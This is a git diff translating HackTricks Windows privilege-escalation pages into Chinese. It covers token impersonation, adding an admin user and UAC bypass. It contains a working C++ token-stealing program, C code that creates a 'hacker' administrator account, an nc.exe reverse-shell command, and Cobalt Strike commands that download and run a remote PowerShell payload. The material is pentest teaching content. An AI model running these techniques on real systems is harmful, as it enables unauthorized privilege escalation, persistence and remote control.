+tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+else
+tp.Privileges[0].Attributes = 0;
+// Enable the privilege or disable all privileges.
+if (!AdjustTokenPrivileges(
+hToken,
+FALSE,
+&tp,
+sizeof(TOKEN_PRIVILEGES),
+(PTOKEN_PRIVILEGES)NULL,
+(PDWORD)NULL))
+{
+printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
+return FALSE;
+}
+if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
+{
+printf("[-] The token does not have the specified privilege. \n");
+return FALSE;
+}
+return TRUE;
 }
 std::string get_username()
 {
-	TCHAR username[UNLEN + 1];
-	DWORD username_len = UNLEN + 1;
-	GetUserName(username, &username_len);
-	std::wstring username_w(username);
-	std::string username_s(username_w.begin(), username_w.end());
-	return username_s;
+TCHAR username[UNLEN + 1];
+DWORD username_len = UNLEN + 1;
+GetUserName(username, &username_len);
+std::wstring username_w(username);
+std::string username_s(username_w.begin(), username_w.end());
+return username_s;
 }
 int main(int argc, char** argv) {
-	// Print whoami to compare to thread later
-	printf("[+] Current user is: %s\n", (get_username()).c_str());
-	// Grab PID from command line argument
-	char* pid_c = argv[1];
-	DWORD PID_TO_IMPERSONATE = atoi(pid_c);
-	// Initialize variables and structures
-	HANDLE tokenHandle = NULL;
-	HANDLE duplicateTokenHandle = NULL;
-	STARTUPINFO startupInfo;
-	PROCESS_INFORMATION processInformation;
-	ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
-	ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
-	startupInfo.cb = sizeof(STARTUPINFO);
-	// Add SE debug privilege
-	HANDLE currentTokenHandle = NULL;
-	BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
-	if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
-	{
-		printf("[+] SeDebugPrivilege enabled!\n");
-	}
-	// Call OpenProcess(), print return code and error code
-	HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, PID_TO_IMPERSONATE);
-	if (GetLastError() == NULL)
-		printf("[+] OpenProcess() success!\n");
-	else
-	{
-		printf("[-] OpenProcess() Return Code: %i\n", processHandle);
-		printf("[-] OpenProcess() Error: %i\n", GetLastError());
-	}
-	// Call OpenProcessToken(), print return code and error code
-	BOOL getToken = OpenProcessToken(processHandle, MAXIMUM_ALLOWED, &tokenHandle);
-	if (GetLastError() == NULL)
-		printf("[+] OpenProcessToken() success!\n");
-	else
-	{
-		printf("[-] OpenProcessToken() Return Code: %i\n", getToken);
-		printf("[-] OpenProcessToken() Error: %i\n", GetLastError());
-	}
-	// Impersonate user in a thread
-	BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
-	if (GetLastError() == NULL)
-	{
-		printf("[+] ImpersonatedLoggedOnUser() success!\n");
-		printf("[+] Current user is: %s\n", (get_username()).c_str());
-		printf("[+] Reverting thread to original user context\n");
-		RevertToSelf();
-	}
-	else
-	{
-		printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
-		printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
-	}
-	// Call DuplicateTokenEx(), print return code and error code
-	BOOL duplicateToken = DuplicateTokenEx(tokenHandle, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
-	if (GetLastError() == NULL)
-		printf("[+] DuplicateTokenEx() success!\n");
-	else
-	{
-		printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken);
-		printf("[-] DupicateTokenEx() Error: %i\n", GetLastError());
-	}
-	// Call CreateProcessWithTokenW(), print return code and error code
-	BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);
-	if (GetLastError() == NULL)
-		printf("[+] Process spawned!\n");
-	else
-	{
-		printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess);
-		printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError());
-	}
-	return 0;
+// Print whoami to compare to thread later
+printf("[+] Current user is: %s\n", (get_username()).c_str());
+// Grab PID from command line argument
+char* pid_c = argv[1];
+DWORD PID_TO_IMPERSONATE = atoi(pid_c);
+// Initialize variables and structures
+HANDLE tokenHandle = NULL;
+HANDLE duplicateTokenHandle = NULL;
+STARTUPINFO startupInfo;
+PROCESS_INFORMATION processInformation;
+ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
+ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
+startupInfo.cb = sizeof(STARTUPINFO);
+// Add SE debug privilege
+HANDLE currentTokenHandle = NULL;
+BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
+if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
+{
+printf("[+] SeDebugPrivilege enabled!\n");
+}
+// Call OpenProcess(), print return code and error code
+HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, PID_TO_IMPERSONATE);
+if (GetLastError() == NULL)
+printf("[+] OpenProcess() success!\n");
+else
+{
+printf("[-] OpenProcess() Return Code: %i\n", processHandle);
+printf("[-] OpenProcess() Error: %i\n", GetLastError());
+}
+// Call OpenProcessToken(), print return code and error code
+BOOL getToken = OpenProcessToken(processHandle, MAXIMUM_ALLOWED, &tokenHandle);
+if (GetLastError() == NULL)
+printf("[+] OpenProcessToken() success!\n");
+else
+{
+printf("[-] OpenProcessToken() Return Code: %i\n", getToken);
+printf("[-] OpenProcessToken() Error: %i\n", GetLastError());
+}
+// Impersonate user in a thread
+BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
+if (GetLastError() == NULL)
+{
+printf("[+] ImpersonatedLoggedOnUser() success!\n");
+printf("[+] Current user is: %s\n", (get_username()).c_str());
+printf("[+] Reverting thread to original user context\n");
+RevertToSelf();
+}
+else
+{
+printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
+printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
+}
+// Call DuplicateTokenEx(), print return code and error code
+BOOL duplicateToken = DuplicateTokenEx(tokenHandle, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
+if (GetLastError() == NULL)
+printf("[+] DuplicateTokenEx() success!\n");
+else
+{
+printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken);
+printf("[-] DupicateTokenEx() Error: %i\n", GetLastError());
+}
+// Call CreateProcessWithTokenW(), print return code and error code
+BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);
+if (GetLastError() == NULL)
+printf("[+] Process spawned!\n");
+else
+{
+printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess);
+printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError());
+}
+return 0;
 }
 ```
+### 错误
 
-### Error
-
-On some occasions you may try to impersonate System and it won't work showing an output like the following:
-
+在某些情况下，您可能会尝试模拟系统，但它不会工作，显示如下输出：
 ```cpp
 [+] OpenProcess() success!
 [+] OpenProcessToken() success!
@@ -156,26 +153,24 @@ On some occasions you may try to impersonate System and it won't work showing an
 [-] CreateProcessWithTokenW Return Code: 0
 [-] CreateProcessWithTokenW Error: 1326
 ```
+这意味着即使您在高完整性级别运行，**您也没有足够的权限**。\
+让我们使用 **processes explorer**（或者您也可以使用 process hacker）检查当前对 `svchost.exe` 进程的管理员权限：
 
-This means that even if you are running on a High Integrity level **you don't have enough permissions**.\
-Let's check current Administrator permissions over `svchost.exe` processes with **processes explorer** (or you can also use process hacker):
-
-1. Select a process of `svchost.exe`
-2. Right Click --> Properties
-3. Inside "Security" Tab click in the bottom right the button "Permissions"
-4. Click on "Advanced"
-5. Select "Administrators" and click on "Edit"
-6. Click on "Show advanced permissions"
+1. 选择一个 `svchost.exe` 进程
+2. 右键点击 --> 属性
+3. 在“安全”选项卡中，点击右下角的“权限”按钮
+4. 点击“高级”
+5. 选择“Administrators”并点击“编辑”
+6. 点击“显示高级权限”
 
 ![](<../../images/image (437).png>)
 
-The previous image contains all the privileges that "Administrators" have over the selected process (as you can see in case of `svchost.exe` they only have "Query" privileges)
+上面的图像包含“Administrators”对所选进程的所有权限（如您所见，在 `svchost.exe` 的情况下，他们只有“查询”权限）
 
-See the privileges "Administrators" have over `winlogon.exe`:
+查看“Administrators”对 `winlogon.exe` 的权限：
 
 ![](<../../images/image (1102).png>)
 
-Inside that process "Administrators" can "Read Memory" and "Read Permissions" which probably allows Administrators to impersonate the token used by this process.
+在该进程中，“Administrators”可以“读取内存”和“读取权限”，这可能允许管理员模拟该进程使用的令牌。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
index 56957d947..fd3c85534 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md
@@ -1,19 +1,14 @@
-{{#include ../../banners/hacktricks-training.md}}
-
-# Add user
-
+# 添加用户
 ```c
 // i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
 
 #include <stdlib.h> /* system, NULL, EXIT_FAILURE */
 int main ()
 {
-    int i;
-    system("net user hacker Hacker123! /add");
-    system("net localgroup administrators hacker /add");
-    return 0;
+int i;
+system("net user hacker Hacker123! /add");
+system("net localgroup administrators hacker /add");
+return 0;
 }
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-security-controls/uac-user-account-control.md b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
index 8f1515ef3..4a6332906 100644
--- a/src/windows-hardening/windows-security-controls/uac-user-account-control.md
+++ b/src/windows-hardening/windows-security-controls/uac-user-account-control.md
@@ -1,131 +1,122 @@
-# UAC - User Account Control
+# UAC - 用户帐户控制
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="../../images/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
 ## UAC
 
-[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. Applications have different `integrity` levels, and a program with a **high level** can perform tasks that **could potentially compromise the system**. When UAC is enabled, applications and tasks always **run under the security context of a non-administrator account** unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.
+[用户帐户控制 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 是一个功能，允许 **提升活动的同意提示**。应用程序具有不同的 `integrity` 级别，具有 **高级别** 的程序可以执行 **可能危害系统** 的任务。当 UAC 启用时，应用程序和任务始终 **在非管理员帐户的安全上下文中运行**，除非管理员明确授权这些应用程序/任务具有管理员级别的系统访问权限。它是一个便利功能，可以保护管理员免受意外更改，但不被视为安全边界。
 
-For more info about integrity levels:
+有关完整性级别的更多信息：
 
 {{#ref}}
 ../windows-local-privilege-escalation/integrity-levels.md
 {{#endref}}
 
-When UAC is in place, an administrator user is given 2 tokens: a standard user key, to perform regular actions as regular level, and one with the admin privileges.
+当 UAC 生效时，管理员用户会获得 2 个令牌：一个标准用户密钥，用于以常规级别执行常规操作，另一个具有管理员权限。
 
-This [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) discusses how UAC works in great depth and includes the logon process, user experience, and UAC architecture. Administrators can use security policies to configure how UAC works specific to their organization at the local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:
+此 [页面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) 深入讨论了 UAC 的工作原理，包括登录过程、用户体验和 UAC 架构。管理员可以使用安全策略在本地级别（使用 secpol.msc）配置 UAC 的工作方式，或通过组策略对象 (GPO) 在 Active Directory 域环境中配置并推送。各种设置在 [这里](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings) 进行了详细讨论。可以为 UAC 设置 10 个组策略设置。以下表格提供了更多详细信息：
 
-| Group Policy Setting                                                                                                                                                                                                                                                                                                                                                           | Registry Key                | Default Setting                                              |
+| 组策略设置                                                                                                                                                                                                                                                                                                                                                           | 注册表项                | 默认设置                                              |
 | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
-| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | Disabled                                                     |
-| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | Disabled                                                     |
-| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | Prompt for consent for non-Windows binaries                  |
-| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | Prompt for credentials on the secure desktop                 |
-| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | Enabled (default for home) Disabled (default for enterprise) |
-| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | Disabled                                                     |
-| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                       | EnableSecureUIAPaths        | Enabled                                                      |
-| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode)                                                                               | EnableLUA                   | Enabled                                                      |
-| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation)                                                       | PromptOnSecureDesktop       | Enabled                                                      |
-| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations)                                       | EnableVirtualization        | Enabled                                                      |
+| [用户帐户控制：内置管理员帐户的管理员批准模式](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account)                                                     | FilterAdministratorToken    | 禁用                                                     |
+| [用户帐户控制：允许 UIAccess 应用程序在不使用安全桌面的情况下提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle      | 禁用                                                     |
+| [用户帐户控制：管理员在管理员批准模式下的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode)                     | ConsentPromptBehaviorAdmin  | 对非 Windows 二进制文件提示同意                  |
+| [用户帐户控制：标准用户的提升提示行为](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users)                                                                   | ConsentPromptBehaviorUser   | 在安全桌面上提示凭据                 |
+| [用户帐户控制：检测应用程序安装并提示提升](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation)                                                       | EnableInstallerDetection    | 启用（家庭版默认）禁用（企业版默认） |
+| [用户帐户控制：仅提升已签名和验证的可执行文件](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated)                                                             | ValidateAdminCodeSignatures | 禁用                                                     |
+| [用户帐户控制：仅提升安装在安全位置的 UIAccess 应用程序](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations)                       | EnableSecureUIAPaths        | 启用                                                      |
+| [用户帐户控制：在管理员批准模式下运行所有管理员](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode)                                                                               | EnableLUA                   | 启用                                                      |
+| [用户帐户控制：在提示提升时切换到安全桌面](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation)                                                       | PromptOnSecureDesktop       | 启用                                                      |
+| [用户帐户控制：将文件和注册表写入失败虚拟化到每用户位置](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations)                                       | EnableVirtualization        | 启用                                                      |
 
-### UAC Bypass Theory
+### UAC 绕过理论
 
-Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary has to be **signed by Microsoft** also.
+一些程序会在 **用户属于** **管理员组** 时 **自动提升**。这些二进制文件在其 _**清单**_ 中具有 _**autoElevate**_ 选项，值为 _**True**_。该二进制文件还必须由 Microsoft **签名**。
 
-Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**.
+然后，为了 **绕过** **UAC**（从 **中等** 完整性级别 **提升到高**），一些攻击者使用这种二进制文件来 **执行任意代码**，因为它将从 **高完整性级别进程** 中执行。
 
-You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
+您可以使用 Sysinternals 的工具 _**sigcheck.exe**_ 检查二进制文件的 _**清单**_。您可以使用 _Process Explorer_ 或 _Process Monitor_（来自 Sysinternals）查看进程的 **完整性级别**。
 
-### Check UAC
-
-To confirm if UAC is enabled do:
+### 检查 UAC
 
+要确认 UAC 是否启用，请执行：
 ```
 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
 
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
-    EnableLUA    REG_DWORD    0x1
+EnableLUA    REG_DWORD    0x1
 ```
+如果是 **`1`**，则 UAC **已激活**；如果是 **`0`** 或者 **不存在**，则 UAC **未激活**。
 
-If it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
-
-Then, check **which level** is configured:
-
+然后，检查 **配置了哪个级别**：
 ```
 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
 
 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
-    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
+ConsentPromptBehaviorAdmin    REG_DWORD    0x5
 ```
+- 如果 **`0`**，则 UAC 不会提示（如 **禁用**）
+- 如果 **`1`**，则管理员会被 **要求输入用户名和密码** 以高权限执行二进制文件（在安全桌面上）
+- 如果 **`2`**（**始终通知我**），UAC 将始终在管理员尝试以高权限执行某些操作时要求确认（在安全桌面上）
+- 如果 **`3`**，类似于 `1`，但不一定在安全桌面上
+- 如果 **`4`**，类似于 `2`，但不一定在安全桌面上
+- 如果 **`5`**（**默认**），它会要求管理员确认以高权限运行非 Windows 二进制文件
 
-- If **`0`** then, UAC won't prompt (like **disabled**)
-- If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
-- If **`2`** (**Always notify me**) UAC will always ask for confirmation to the administrator when he tries to execute something with high privileges (on Secure Desktop)
-- If **`3`** like `1` but not necessary on Secure Desktop
-- If **`4`** like `2` but not necessary on Secure Desktop
-- if **`5`**(**default**) it will ask the administrator to confirm to run non Windows binaries with high privileges
+然后，您需要查看 **`LocalAccountTokenFilterPolicy`** 的值\
+如果值为 **`0`**，则只有 **RID 500** 用户（**内置管理员**）能够在没有 UAC 的情况下执行 **管理员任务**，如果为 `1`，则 **“Administrators”** 组中的所有帐户都可以执行这些任务。
 
-Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\
-If the value is **`0`**, then, only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them.
+最后，查看 **`FilterAdministratorToken`** 键的值\
+如果 **`0`**（默认），则 **内置管理员帐户可以** 执行远程管理任务；如果 **`1`**，则内置管理员帐户 **不能** 执行远程管理任务，除非 `LocalAccountTokenFilterPolicy` 设置为 `1`。
 
-And, finally take a look at the value of the key **`FilterAdministratorToken`**\
-If **`0`**(default), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
+#### 摘要
 
-#### Summary
+- 如果 `EnableLUA=0` 或 **不存在**，**对任何人都没有 UAC**
+- 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=1`，对任何人都没有 UAC**
+- 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=0` 且 `FilterAdministratorToken=0`，对 RID 500（内置管理员）没有 UAC**
+- 如果 `EnableLua=1` 且 **`LocalAccountTokenFilterPolicy=0` 且 `FilterAdministratorToken=1`，对所有人都有 UAC**
 
-- If `EnableLUA=0` or **doesn't exist**, **no UAC for anyone**
-- If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
-- If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
-- If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**
-
-All this information can be gathered using the **metasploit** module: `post/windows/gather/win_privs`
-
-You can also check the groups of your user and get the integrity level:
+所有这些信息可以通过 **metasploit** 模块收集：`post/windows/gather/win_privs`
 
+您还可以检查用户的组并获取完整性级别：
 ```
 net user %username%
 whoami /groups | findstr Level
 ```
-
-## UAC bypass
+## UAC 绕过
 
 > [!NOTE]
-> Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
+> 请注意，如果您可以图形访问受害者，UAC 绕过是直接的，因为您可以在 UAS 提示出现时简单地点击“是”
 
-The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.
+UAC 绕过在以下情况下是必要的：**UAC 已激活，您的进程在中等完整性上下文中运行，并且您的用户属于管理员组**。
 
-It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**
+重要的是要提到，如果 UAC 处于最高安全级别（始终），则**绕过 UAC 要困难得多，而不是在其他任何级别（默认）**。
 
-### UAC disabled
-
-If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
+### UAC 禁用
 
+如果 UAC 已经禁用（`ConsentPromptBehaviorAdmin` 为 **`0`**），您可以使用类似的方式**以管理员权限执行反向 shell**（高完整性级别）：
 ```bash
 #Put your reverse shell instead of "calc.exe"
 Start-Process powershell -Verb runAs "calc.exe"
 Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
 ```
-
-#### UAC bypass with token duplication
+#### UAC 绕过与令牌复制
 
 - [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
 - [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
 
-### **Very** Basic UAC "bypass" (full file system access)
+### **非常** 基本的 UAC "绕过"（完全文件系统访问）
 
-If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
+如果你有一个属于管理员组的用户的 shell，你可以 **通过 SMB 挂载 C$** 共享到一个新的磁盘上，这样你将 **访问到文件系统中的所有内容**（甚至是管理员的主文件夹）。
 
 > [!WARNING]
-> **Looks like this trick isn't working anymore**
-
+> **看起来这个技巧不再有效**
 ```bash
 net use Z: \\127.0.0.1\c$
 cd C$
@@ -133,11 +124,9 @@ cd C$
 #Or you could just access it:
 dir \\127.0.0.1\c$\Users\Administrator\Desktop
 ```
+### UAC绕过与Cobalt Strike
 
-### UAC bypass with cobalt strike
-
-The Cobalt Strike techniques will only work if UAC is not set at it's max security level
-
+Cobalt Strike技术仅在UAC未设置为最高安全级别时有效。
 ```bash
 # UAC bypass via token duplication
 elevate uac-token-duplication [listener_name]
@@ -149,20 +138,18 @@ runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-obj
 # Bypass UAC with CMSTPLUA COM interface
 runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
 ```
-
-**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
+**Empire** 和 **Metasploit** 也有几个模块可以 **绕过** **UAC**。
 
 ### KRBUACBypass
 
-Documentation and tool in [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
+文档和工具在 [https://github.com/wh0amitz/KRBUACBypass](https://github.com/wh0amitz/KRBUACBypass)
 
-### UAC bypass exploits
+### UAC 绕过漏洞
 
-[**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like `Source\Akagi\outout\x64\Debug\Akagi.exe`) , you will need to know **which one you need.**\
-You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
-
-UACME has the **build version from which each technique started working**. You can search for a technique affecting your versions:
+[**UACME** ](https://github.com/hfiref0x/UACME) 是几个 UAC 绕过漏洞的 **汇编**。请注意，您需要 **使用 Visual Studio 或 msbuild 编译 UACME**。编译将创建几个可执行文件（如 `Source\Akagi\outout\x64\Debug\Akagi.exe`），您需要知道 **您需要哪个**。\
+您应该 **小心**，因为某些绕过会 **提示其他程序**，这会 **警告** **用户** 有事情发生。
 
+UACME 有 **每个技术开始工作的构建版本**。您可以搜索影响您版本的技术：
 ```
 PS C:\> [environment]::OSVersion.Version
 
@@ -170,50 +157,48 @@ Major  Minor  Build  Revision
 -----  -----  -----  --------
 10     0      14393  0
 ```
+也可以使用[这个](https://en.wikipedia.org/wiki/Windows_10_version_history)页面从构建版本中获取Windows版本`1607`。
 
-Also, using [this](https://en.wikipedia.org/wiki/Windows_10_version_history) page you get the Windows release `1607` from the build versions.
+#### 更多UAC绕过
 
-#### More UAC bypass
+**所有**用于绕过AUC的技术**都需要**与受害者建立**完整的交互式Shell**（普通的nc.exe Shell不够）。
 
-**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
-
-You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**:
